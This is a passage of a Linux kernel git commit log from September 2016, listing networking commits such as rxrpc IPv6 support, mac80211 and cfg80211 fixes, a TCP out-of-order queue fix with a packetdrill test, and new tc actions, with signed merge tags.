Remove a tab that's on a line that should otherwise be blank.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:50:15 +01:00
David Howells
d19127473a rxrpc: Make IPv6 support conditional on CONFIG_IPV6
Add CONFIG_AF_RXRPC_IPV6 and make the IPv6 support code conditional on it.
This is then made conditional on CONFIG_IPV6.

Without this, the following can be seen:

   net/built-in.o: In function `rxrpc_init_peer':
>> peer_object.c:(.text+0x18c3c8): undefined reference to `ip6_route_output_flags'

Reported-by: kbuild test robot <fengguang.wu@intel.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 03:58:45 -04:00
Linus Torvalds
87ee1280ff Fix a memory corruption bug that I introduced in 4.7.
-----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJX3GKYAAoJECebzXlCjuG+7jEQAIgMFl0feSlYrWqPjHZuUXcu
 uNdvnxKgWWP+JJp5pEh+uFLUsXqamfMqcEj4B0OgcoZcsYMDVsAEafeSWkdNVQeO
 Wr+j+IBcC1oECGA5MbZWzHBzw1CMq5/l411pvU+2xeZl8iG83MCl9su8dgf4ctAe
 hc7asU5fiQ+nazhfBaKpVzMAQO+G76E5J90B/Y+VbjYvtQoITUaT3R/PqBIKoG6j
 ezlElPHKddD2Yd8JnqPfnQ521I4yQL2AhrtJzQayCAnDlBXJ0B41IchcFRxPJPBX
 teNybHjHX9XQMGyE13EM4MO43AM9Bfcn7hAUPppag4tnvmS34fkIbBsWwWJjTmhR
 sjfLoBbP11KgGUjg7vRbNNsQ1zHhDyvss5ChUQAqfkDDH7CpnmOPXUqKKSGIfVvw
 fCpBMqxh5xwSzX3m2Wm2wVsUYH0rSyTKmcomdrZw0o577L2HsoaqWa2hcD/v7fE2
 MtPnYLszJXJA3k1ZLoJ6L4sFphznOwzwrj8oLpan5YGsJnonyHcequZw9Z4YoMYG
 YPztd/kwctIezKhHyRqmr8lghTJ5vjLK49FfJEjrDAb8vfXq3Gwb7ZkwtZBH9RSw
 CV2vmJ1ny9PRRCKw0UCYAfUv5ucS2JiRbk31qjoIMYpDWJQghrZHnltRxgKg5UDW
 ZxTGNLwH/WXRVHJzTaeE
 =gr4D
 -----END PGP SIGNATURE-----

Merge tag 'nfsd-4.8-2' of git://linux-nfs.org/~bfields/linux

Pull nfsd bugfix from Bruce Fields:
 "Fix a memory corruption bug that I introduced in 4.7"

* tag 'nfsd-4.8-2' of git://linux-nfs.org/~bfields/linux:
  svcauth_gss: Revert 64c59a3726 ("Remove unnecessary allocation")
2016-09-16 17:00:26 -07:00
Luca Coelho
fbd05e4a6e cfg80211: add helper to find an IE that matches a byte-array
There are a few places where an IE that matches not only the EID, but
also other bytes inside the element, needs to be found.  To simplify
that and reduce the amount of similar code, implement a new helper
function to match the EID and an extra array of bytes.

Additionally, simplify cfg80211_find_vendor_ie() by using the new
match function.

Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-16 14:49:52 +02:00
Emmanuel Grumbach
c68df2e7be mac80211: allow using AP_LINK_PS with mac80211-generated TIM IE
In 46fa38e84b ("mac80211: allow software PS-Poll/U-APSD with
AP_LINK_PS"), Johannes allowed to use mac80211's code for handling
stations that go to PS or send PS-Poll / uAPSD trigger frames for
devices that enable RSS.

This means that mac80211 doesn't look at frames anymore but rather
relies on a notification that will come from the device when a PS
transition occurs or when a PS-Poll / trigger frame is detected by
the device.

iwlwifi will need this capability but still needs mac80211 to take
care of the TIM IE. Today, if a driver sets AP_LINK_PS, mac80211
will not update the TIM IE. Change mac80211 to check existence of
the set_tim driver callback rather than using AP_LINK_PS to decide
if the driver handles the TIM IE internally or not.

Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
[reword commit message a bit]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-16 14:49:23 +02:00
John Crispin
cafdc45c94 net-next: dsa: add Qualcomm tag RX/TX handler
Add support for the 2-bytes Qualcomm tag that gigabit switches such as
the QCA8337/N might insert when receiving packets, or that we need
to insert while targeting specific switch ports. The tag is inserted
directly behind the ethernet header.

Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Reviewed-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: John Crispin <john@phrozen.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 04:31:51 -04:00
Mark Tomlinson
d6f64d725b net: VRF: Pass original iif to ip_route_input()
The function ip_rcv_finish() calls l3mdev_ip_rcv(). On any VRF except
the global VRF, this replaces skb->dev with the VRF master interface.
When calling ip_route_input_noref() from here, the checks for forwarding
look at this master device instead of the initial ingress interface.
This will allow packets to be routed which normally would be dropped.
For example, an interface that is not assigned an IP address should
drop packets, but because the checking is against the master device, the
packet will be forwarded.

The fix here is to still call l3mdev_ip_rcv(), but remember the initial
net_device. This is passed to the other functions within ip_rcv_finish,
so they still see the original interface.

Signed-off-by: Mark Tomlinson <mark.tomlinson@alliedtelesis.co.nz>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 04:24:07 -04:00
David S. Miller
6777ae8083 Here are two batman-adv bugfix patches:
- Fix reference counting for last_bonding_candidate, by Sven Eckelmann
 
  - Fix head room reservation for ELP packets, by Linus Luessing
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdBQJX2UCwFhxzd0BzaW1vbnd1bmRlcmxpY2guZGUACgkQoSvjmEKS
 nqHp+w/+MGG87sjUfObJKrSTmsIDgWHl2VSQwKBivbkvIuBm9gxIhFblaBQEJd5A
 88Z5LOGWpnxh2rfFIPurTLxkYAZyARpIxWOLVtmPE3TdfMi4savTsvkOywd0ZHqE
 kXZH1QHE/Y3CQBf9FaM5cgTiwAXjZ+KWr5kRg3WNmH0oQUepndUBb5AAbjpD2G3f
 Gt4TsfunplXCmA/5uJMISOjKiub8usUhXVXBHVpxR+ZItdoIolwN197wDzXT8pWK
 FJe+Flqrvxi3n0kNFknUzCDdt09TFLms4m0AEu+8f4P6t1mR7v+YHNM4IlBx8BX0
 6Kwiz009h9+5JFZvOSTCy6tkrodn5cAk9LNNsam5uPTWXeY76gFOzegdHIcIaBxq
 MLEqnTUgONqOakZs+4NopUz0HUvtJXDGYJcy7SDLYIYEwhaHP7seyuPkjA+xap2p
 uPZR3dTYESdeNGs/uPTEGVh1q8w6xXqXe9IRzP1KvGAOsg5IXCboLvJHpVMc25aT
 4CT9qz5H94sVqdR6d5pBb+0CLoxnhbl+4IjKnHwMBzVM/0LVDJZRmx9qgiNHJ+0f
 PGQeQEbAfrihORRn2jCEq0YLCHKhjvLw9O7GVj353wmiVkvvuR+MQEv+bcDgu0DE
 mH9maOpcOahud6S+x+m9of3f3ytwWR4UO2Qk5t1RdIuVRSD7sXM=
 =mHPX
 -----END PGP SIGNATURE-----

Merge tag 'batadv-net-for-davem-20160914' of git://git.open-mesh.org/linux-merge

Simon Wunderlich says:

====================
Here are two batman-adv bugfix patches:

 - Fix reference counting for last_bonding_candidate, by Sven Eckelmann

 - Fix head room reservation for ELP packets, by Linus Luessing
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 04:17:33 -04:00
Eric Dumazet
76f0dcbb5a tcp: fix a stale ooo_last_skb after a replace
When skb replaces another one in ooo queue, I forgot to also
update tp->ooo_last_skb as well, if the replaced skb was the last one
in the queue.

To fix this, we simply can re-use the code that runs after an insertion,
trying to merge skbs at the right of current skb.

This not only fixes the bug, but also remove all small skbs that might
be a subset of the new one.

Example:

We receive segments 2001:3001,  4001:5001

Then we receive 2001:8001 : We should replace 2001:3001 with the big
skb, but also remove 4001:50001 from the queue to save space.

packetdrill test demonstrating the bug

0.000 socket(..., SOCK_STREAM, IPPROTO_TCP) = 3
+0 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
+0 bind(3, ..., ...) = 0
+0 listen(3, 1) = 0

+0 < S 0:0(0) win 32792 <mss 1000,sackOK,nop,nop,nop,wscale 7>
+0 > S. 0:0(0) ack 1 <mss 1460,nop,nop,sackOK,nop,wscale 7>
+0.100 < . 1:1(0) ack 1 win 1024
+0 accept(3, ..., ...) = 4

+0.01 < . 1001:2001(1000) ack 1 win 1024
+0    > . 1:1(0) ack 1 <nop,nop, sack 1001:2001>

+0.01 < . 1001:3001(2000) ack 1 win 1024
+0    > . 1:1(0) ack 1 <nop,nop, sack 1001:2001 1001:3001>

Fixes: 9f5afeae51 ("tcp: use an RB tree for ooo receive queue")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yuchung Cheng <ycheng@google.com>
Cc: Yaogong Wang <wygivan@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 04:09:49 -04:00
David S. Miller
364eac0c8b RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV9h/5PSw1s6N8H32AQLJCQ//RFbu0SNSoJnnZbOTwkxBaGYnGg4KbNVt
 iR4zumQfFssyYr7WcH1S6kuPzM/dJfjkRYqollyUGCEfnWyDwyfnjM9Na9PQoZ9F
 k7xnbim8N65njHLdGF6QMhenmoRXSBVCN2E0uPTbBXurFHJ8ZgQQs+DhogalvGUl
 2TL/aMdpqRoo1Vg0/APVOKeLGqgHEhrXxelTZB/74IXyYT+rzjfzu+ZfwxUAijsM
 d+FBSwY+D8RYSV4LXQzMNNFCwNORbG2Rse2nEqd7bVqdVywWsuhbgeESjx1Y3+ge
 /mofVyxrpoblT9qsScbISbIQEe6cLxRiQgQHEudennRI2/3EbpNSijhNFWVon2Em
 NAa7r+tfOPtVx5JTL9NyvwtrXPfAgDi7Stpml3Yhhr/CjRHYK9kfKysowMXL5vOz
 NHD0fUozNLecpGCmdxG+alwf5BJ5q9DRPP7bI7KE/4FfVsYe8bO6pQ9G+myeP/A4
 h8DuvK4xSJUEpEa5dpDLA1wSC2XH5PgYdXIr2DFBaFjllIdf1cGNKKIYRF2eIX/I
 obVD7c72oZV1kIK3URTLJpE+CdA4KgTFuL3YqIxquA2Iedb1t2uOrQcp4WwaWf7V
 REY9KbBn1F0+yJfO3Fjckerzle+MlAmrAHQpkZUduo5JzdRm3DY++YzswXQT5Fpr
 8S3T30nwY0k=
 =T1wh
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160913-2' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Support IPv6

Here is a set of patches that add IPv6 support.  They need to be applied on
top of the just-posted miscellaneous fix patches.  They are:

 (1) Make autobinding of an unconnected socket work when sendmsg() is
     called to initiate a client call.

 (2) Don't specify the protocol when creating the client socket, but rather
     take the default instead.

 (3) Use rxrpc_extract_addr_from_skb() in a couple of places that were
     doing the same thing manually.  This allows the IPv6 address
     extraction to be done in fewer places.

 (4) Add IPv6 support.  With this, calls can be made to IPv6 servers from
     userspace AF_RXRPC programs; AFS, however, can't use IPv6 yet as the
     RPC calls need to be upgradeable.
====================

Reviewed-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 01:57:19 -04:00
David S. Miller
39caa8bf6d RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV9h5A/Sw1s6N8H32AQJOPA//UI0606GZV2zjGqvWYbwquxjhWbbiVfEx
 CB5BeiQjKs8MxrJeHT/+bh6Z1Y6YorkyrVCc7kI1RQ+yiN0hw49bhFfF9Kr46DBF
 gYI2VdiKjIFEgC9fTenLkhMDQC7Hhf9O50hzk9QcC4y7w1Lhytah97d9w+Df0ECy
 a2QLMe2Ad9K5qR08ih3yTH7+G9K1m4/iqIrON2Hd9Opb+oFJgOiixvUVPr9f/6Xd
 /2YeAPDy/2A1MQ2nNE+oSW4C5uD+mJICqjjSw9YyhYl31lIfwBZ7+DE9hjR1qCXj
 UzMJLKrutXQQ1U7/Fbbke6UU5yKVm1djQB1qTF8t1hCHp/q88E7T06UUU9oBDqe0
 98CjPofEXBcqn9hjrXIvJgxCEISTPHx9ikaq0i5yF/6pSHZ9G8gLUfrqbMwipkfk
 mXItd6HAHXhX7cS5u76v7I4c9u5olexX5cJ91/ibtOdsupiJTMLwCx4twR6knEcS
 /6SSqjklFL4f6HjuNlNJ8m2dB98DII+Ym0qo/ZQy4KUm/+0yzrkpGHvt32CR4wng
 qjtDN+KgxNss1duu4zkHgQe22u3iSRToxwydWTIQYY6tx4e08X1eSIFRL5ddYpEC
 bjnOtmniAyDP5YF1jRwFDLS3YzT9Uvrf0TVAOvU7/FjPh3KCGa8fn38xIbEsX6eI
 1uadG1bf9wg=
 =vHfH
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160913-1' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Miscellaneous fixes

Here's a set of miscellaneous fix patches.  There are a couple of points of
note:

 (1) There is one non-fix patch that adjusts the call ref tracking
     tracepoint to make kernel API-held refs on calls more obvious.  This
     is a prerequisite for the patch that fixes prealloc refcounting.

 (2) The final patch alters how jumbo packets that partially exceed the
     receive window are handled.  Previously, space was being left in the
     Rx buffer for them, but this significantly hurts performance as the Rx
     window can't be increased to match the OpenAFS Tx window size.

     Instead, the excess subpackets are discarded and an EXCEEDS_WINDOW ACK
     is generated for the first.  To avoid the problem of someone trying to
     run the kernel out of space by feeding the kernel a series of
     overlapping maximal jumbo packets, we stop allowing jumbo packets on a
     call if we encounter more than three jumbo packets with duplicate or
     excessive subpackets.
====================

Reviewed-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 01:52:20 -04:00
David S. Miller
3e454fd5db A few more fixes:
* better mesh path fixing, from Thomas
  * fix TIM IE recalculation after sending frames
    to a sleeping station, from Felix
  * fix sequence number assignment while sending
    frames to a sleeping station, also from Felix
  * validate number of probe response CSA counter
    offsets, fixing a copy/paste bug (from myself)
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJX2FrGAAoJEGt7eEactAAd/ZUP/ix4CokfC/WYxAYoOI6R2X+X
 UVvkFgG8hsZMzm2PZ4bg14jx9cQdnisgzxJnDgwoYvAnjBR0mbPl50LXoJ+JTlVr
 JnoIeMEKXqtxP099B4ssSCpW8YEr6Ex8RFweqN5vLuyIhlW63To1pOMvj9+zvUDB
 3P7CmX2D7cWYys8ciDEaNhHziJRAdd9AruWf3emS1IhScDw05NlDQlff6FZpG/gW
 JMVGjKs+v5DdT3SH677/S6KfpwkPEpIoWzgYH32OW7nXxfuYZCoMWSdeoCfgNe+i
 WgZ154RPBD/YcXsCdNtw36uped7qlrS55Fnlyi1bKMx7vdKLJHABh+FB7qxFpO2F
 2gh3G/KBcuGFfOihPXp11m3LlUn+ml1Ri3F8ffwvoO2ZoZGDplrH6oX2+Q9Hlm7U
 zvhuVzLriq0xHGZhv4EXqMt+70Zk0GvwzBviSjYXEwUJ+h/FkCyrVyUCpfmko9lf
 8QMhI+rm0b5BtOvTkGI4ghEbpz80x1UnnUEGiMdzFhFIunSy43EzJ/RbpiAiaOCI
 pou/moi9+0yMAuJQkMEK2Yg+DdluTsSNuMHB7NKTx8o/wzwgFWFJ6jHlQO72SM43
 k0Ku66LyJfovmv03dPaTxDSISaoxsn+1+SlsUPAF0usLyLka9A0WBjOE8edfDI0h
 hAamoQ0QHd4OlHtgKib6
 =xzhM
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-for-davem-2016-09-13' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211

Johannes Berg says:

====================
A few more fixes:
 * better mesh path fixing, from Thomas
 * fix TIM IE recalculation after sending frames
   to a sleeping station, from Felix
 * fix sequence number assignment while sending
   frames to a sleeping station, also from Felix
 * validate number of probe response CSA counter
   offsets, fixing a copy/paste bug (from myself)
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-16 01:34:08 -04:00
Lance Richardson
2679d04041 openvswitch: avoid deferred execution of recirc actions
The ovs kernel data path currently defers the execution of all
recirc actions until stack utilization is at a minimum.
This is too limiting for some packet forwarding scenarios due to
the small size of the deferred action FIFO (10 entries). For
example, broadcast traffic sent out more than 10 ports with
recirculation results in packet drops when the deferred action
FIFO becomes full, as reported here:

     http://openvswitch.org/pipermail/dev/2016-March/067672.html

Since the current recursion depth is available (it is already tracked
by the exec_actions_level pcpu variable), we can use it to determine
whether to execute recirculation actions immediately (safe when
recursion depth is low) or defer execution until more stack space is
available.

With this change, the deferred action fifo size becomes a non-issue
for currently failing scenarios because it is no longer used when
there are three or fewer recursions through ovs_execute_actions().

Suggested-by: Pravin Shelar <pshelar@ovn.org>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 20:35:52 -04:00
Or Gerlitz
a53d850a79 net/sched: cls_flower: Remove an unused field from the filter key structure
Commit c3f8324188 "net: Add full IPv6 addresses to flow_keys" added an
unused instance of struct flow_dissector_key_addrs into struct fl_flow_key,
remove it.

Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
Reported-by: Hadar Hen Zion <hadarh@mellanox.com>
Acked-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 20:27:23 -04:00
Or Gerlitz
aa72d70837 net/sched: cls_flower: Support masking for matching on tcp/udp ports
Add the definitions for src/dst udp/tcp port masks and use
them when setting && dumping the relevant keys.

Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
Signed-off-by: Paul Blakey <paulb@mellanox.com>
Acked-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 20:27:23 -04:00
Jamal Hadi Salim
86da71b573 net_sched: Introduce skbmod action
This action is intended to be an upgrade from a usability perspective
from pedit (as well as operational debugability).
Compare this:

sudo tc filter add dev $ETH parent 1: protocol ip prio 10 \
u32 match ip protocol 1 0xff flowid 1:2 \
action pedit munge offset -14 u8 set 0x02 \
munge offset -13 u8 set 0x15 \
munge offset -12 u8 set 0x15 \
munge offset -11 u8 set 0x15 \
munge offset -10 u16 set 0x1515 \
pipe

to:

sudo tc filter add dev $ETH parent 1: protocol ip prio 10 \
u32 match ip protocol 1 0xff flowid 1:2 \
action skbmod dmac 02:15:15:15:15:15

Also try to do a MAC address swap with pedit or worse
try to debug a policy with destination mac, source mac and
etherype. Then make few rules out of those and you'll get my point.

In the future common use cases on pedit can be migrated to this action
(as an example different fields in ip v4/6, transports like tcp/udp/sctp
etc). For this first cut, this allows modifying basic ethernet header.

The most important ethernet use case at the moment is when redirecting or
mirroring packets to a remote machine. The dst mac address needs a re-write
so that it doesnt get dropped or confuse an interconnecting (learning) switch
or dropped by a target machine (which looks at the dst mac). And at times
when flipping back the packet a swap of the MAC addresses is needed.

Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 19:33:47 -04:00
Daniel Borkmann
f53d8c7b18 bpf: use skb_at_tc_ingress helper in tcf_bpf
We have a small skb_at_tc_ingress() helper for testing for ingress, so
make use of it. cls_bpf already uses it and so should act_bpf.

Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 19:29:47 -04:00
Daniel Borkmann
04b3f8de4b bpf: drop unnecessary test in cls_bpf_classify and tcf_bpf
The skb_mac_header_was_set() test in cls_bpf's and act_bpf's fast-path is
actually unnecessary and can be removed altogether. This was added by
commit a166151cbe ("bpf: fix bpf helpers to use skb->mac_header relative
offsets"), which was later on improved by 3431205e03 ("bpf: make programs
see skb->data == L2 for ingress and egress"). We're always guaranteed to
have valid mac header at the time we invoke cls_bpf_classify() or tcf_bpf().

Reason is that since 6d1ccff627 ("net: reset mac header in dev_start_xmit()")
we do skb_reset_mac_header() in __dev_queue_xmit() before we could call
into sch_handle_egress() or any subsequent enqueue. sch_handle_ingress()
always sees a valid mac header as well (things like skb_reset_mac_len()
would badly fail otherwise). Thus, drop the unnecessary test in classifier
and action case.

Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 19:29:47 -04:00
Hadar Hen Zion
07c0f09e23 net/sched: act_tunnel_key: Remove rcu_read_lock protection
Remove rcu_read_lock protection from tunnel_key_dump and use
rtnl_dereference, dump operation is protected by  rtnl lock.

Also, remove rcu_read_lock from tunnel_key_release and use
rcu_dereference_protected.

Both operations are running exclusively and a writer couldn't modify
t->params while those functions are executed.

Fixes: 54d94fd89d90 ('net/sched: Introduce act_tunnel_key')
Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Acked-by: John Fastabend <john.r.fastabend@intel.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-15 19:18:18 -04:00
Johannes Berg
ec53c832ee cfg80211: remove unnecessary pointer-of
For an array, there's no need to use &array, so just use the
plain wiphy->addresses[i].addr here to silence smatch.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:20 +02:00
Rajkumar Manoharan
e8a24cd4b8 mac80211: allow driver to handle packet-loss mechanism
Based on consecutive msdu failures, mac80211 triggers CQM packet-loss
mechanism. Drivers like ath10k that have its own connection monitoring
algorithm, offloaded to firmware for triggering station kickout. In case
of station kickout, driver will report low ack status by mac80211 API
(ieee80211_report_low_ack).

This flag will enable the driver to completely rely on firmware events
for station kickout and bypass mac80211 packet loss mechanism.

Signed-off-by: Rajkumar Manoharan <rmanohar@qti.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:20 +02:00
Johannes Berg
c7e9dbcf09 mac80211: remove sta_remove_debugfs driver callback
No drivers implement this, relying either on the recursive
directory removal to remove their debugfs, or not having any
to start with. Remove the dead driver callback.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:19 +02:00
Johannes Berg
8826fef95b mac80211: remove pointless chanctx NULL check
If chanctx is derived as container_of() from a non-NULL pointer,
it can't ever be NULL. Since we checked conf before, that's true
here, so remove the useless NULL check.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:19 +02:00
Johannes Berg
5140974dca mac80211: remove unused assignment
The next line overwrites this assignment, so remove it; there's
no real value in using it for the next assignment either.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:18 +02:00
Johannes Berg
53b18980fd nl80211: always check nla_put* return values
A few instances were found where we didn't check them, add the
missing checks even though they'll probably never trigger as
the message should be large enough here.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:17 +02:00
Johannes Berg
76e1fb4b55 nl80211: always check nla_nest_start() return value
If the message got full during nla_nest_start(), it can return
NULL. None of the cases here seem like that can really happen,
but check the return value nonetheless.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:17 +02:00
Johannes Berg
58bd7f1158 mac80211: fix scan completed tracing
Passing the 'info' pointer where a 'info->aborted' is expected will
always lead to tracing to erroneously record that the scan was aborted,
fix that by passing the correct info->aborted. The remaining data will
be collected in cfg80211, so I haven't duplicated it here.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:16 +02:00
Johannes Berg
93db1d9e6c mac80211: fix possible out-of-bounds access
In the unlikely situation that the supplicant has negotiated
admission for the background AC (which it has no reason to as
it's not supposed to be requiring admission control to start
with, and we'd ignore such a requirement anyway), the loop
here may terminate with non_acm_ac == 4, which leads to an
array overrun.

Check this explicitly just for completeness.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:46:16 +02:00
Johannes Berg
f1c1f17ac5 cfg80211: allow connect keys only with default (TX) key
There's no point in allowing connect keys when one of them
isn't also configured as the TX key, it would just confuse
drivers and probably cause them to pick something for TX.
Disallow this confusing and erroneous configuration.

As wpa_supplicant will always send NL80211_ATTR_KEYS, even
when there are no keys inside, allow that and treat it as
though the attribute isn't present at all.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 16:45:41 +02:00
Johannes Berg
85d5313ed7 mac80211: reject TSPEC TIDs (TSIDs) for aggregation
Since mac80211 doesn't currently support TSIDs 8-15 which can
only be used after QoS TSPEC negotiation (and not even after
WMM negotiation), reject attempts to set up aggregation
sessions for them, which might confuse drivers. In mac80211
we do correctly handle that, but the TSIDs should never get
used anyway, and drivers might not be able to handle it.

Cc: stable@vger.kernel.org
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-15 10:08:52 +02:00
Johannes Berg
0b97a484e5 mac80211: check skb_linearize() return value
The A-MSDU TX code (within TXQs) didn't always check the return value
of skb_linearize() properly, resulting in potentially passing a frag-
list SKB down to the driver even when it said it can't handle it. Fix
that.

Fixes: 6e0456b545 ("mac80211: add A-MSDU tx support")
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-14 12:08:33 +02:00
David Howells
75b54cb57c rxrpc: Add IPv6 support
Add IPv6 support to AF_RXRPC.  With this, AF_RXRPC sockets can be created:

	service = socket(AF_RXRPC, SOCK_DGRAM, PF_INET6);

instead of:

	service = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);

The AFS filesystem doesn't support IPv6 at the moment, though, since that
requires upgrades to some of the RPC calls.

Note that a good portion of this patch is replacing "%pI4:%u" in print
statements with "%pISpc" which is able to handle both protocols and print
the port.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 23:09:13 +01:00
David Howells
1c2bc7b948 rxrpc: Use rxrpc_extract_addr_from_skb() rather than doing this manually
There are two places that want to transmit a packet in response to one just
received and manually pick the address to reply to out of the sk_buff.
Make them use rxrpc_extract_addr_from_skb() instead so that IPv6 is handled
automatically.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 23:09:13 +01:00
David Howells
aaa31cbc66 rxrpc: Don't specify protocol to when creating transport socket
Pass 0 as the protocol argument when creating the transport socket rather
than IPPROTO_UDP.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 23:09:13 +01:00
David Howells
cd5892c756 rxrpc: Create an address for sendmsg() to bind unbound socket with
Create an address for sendmsg() to bind unbound socket with rather than
using a completely blank address otherwise the transport socket creation
will fail because it will try to use address family 0.

We use the address family specified in the protocol argument when the
AF_RXRPC socket was created and SOCK_DGRAM as the default.  For anything
else, bind() must be used.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 23:09:13 +01:00
David Howells
75e4212639 rxrpc: Correctly initialise, limit and transmit call->rx_winsize
call->rx_winsize should be initialised to the sysctl setting and the sysctl
setting should be limited to the maximum we want to permit.  Further, we
need to place this in the ACK info instead of the sysctl setting.

Furthermore, discard the idea of accepting the subpackets of a jumbo packet
that lie beyond the receive window when the first packet of the jumbo is
within the window.  Just discard the excess subpackets instead.  This
allows the receive window to be opened up right to the buffer size less one
for the dead slot.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:38:45 +01:00
David Howells
3432a757b1 rxrpc: Fix prealloc refcounting
The preallocated call buffer holds a ref on the calls within that buffer.
The ref was being released in the wrong place - it worked okay for incoming
calls to the AFS cache manager service, but doesn't work right for incoming
calls to a userspace service.

Instead of releasing an extra ref service calls in rxrpc_release_call(),
the ref needs to be released during the acceptance/rejectance process.  To
this end:

 (1) The prealloc ref is now normally released during
     rxrpc_new_incoming_call().

 (2) For preallocated kernel API calls, the kernel API's ref needs to be
     released when the call is discarded on socket close.

 (3) We shouldn't take a second ref in rxrpc_accept_call().

 (4) rxrpc_recvmsg_new_call() needs to get a ref of its own when it adds
     the call to the to_be_accepted socket queue.

In doing (4) above, we would prefer not to put the call's refcount down to
0 as that entails doing cleanup in softirq context, but it's unlikely as
there are several refs held elsewhere, at least one of which must be put by
someone in process context calling rxrpc_release_call().  However, it's not
a problem if we do have to do that.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:38:37 +01:00
David Howells
cbd00891de rxrpc: Adjust the call ref tracepoint to show kernel API refs
Adjust the call ref tracepoint to show references held on a call by the
kernel API separately as much as possible and add an additional trace to at
the allocation point from the preallocation buffer for an incoming call.

Note that this doesn't show the allocation of a client call for the kernel
separately at the moment.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:38:30 +01:00
David Howells
01fd074224 rxrpc: Allow tx_winsize to grow in response to an ACK
Allow tx_winsize to grow when the ACK info packet shows a larger receive
window at the other end rather than only permitting it to shrink.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:38:24 +01:00
David Howells
89a80ed4c0 rxrpc: Use skb->len not skb->data_len
skb->len should be used rather than skb->data_len when referring to the
amount of data in a packet.  This will only cause a malfunction in the
following cases:

 (1) We receive a jumbo packet (validation and splitting both are wrong).

 (2) We see if there's extra ACK info in an ACK packet (we think it's not
     there and just ignore it).

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:36:22 +01:00
David Howells
b25de36053 rxrpc: Add missing unlock in rxrpc_call_accept()
Add a missing unlock in rxrpc_call_accept() in the path taken if there's no
call to wake up.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:36:22 +01:00
David Howells
33b603fda8 rxrpc: Requeue call for recvmsg if more data
rxrpc_recvmsg() needs to make sure that the call it has just been
processing gets requeued for further attention if the buffer has been
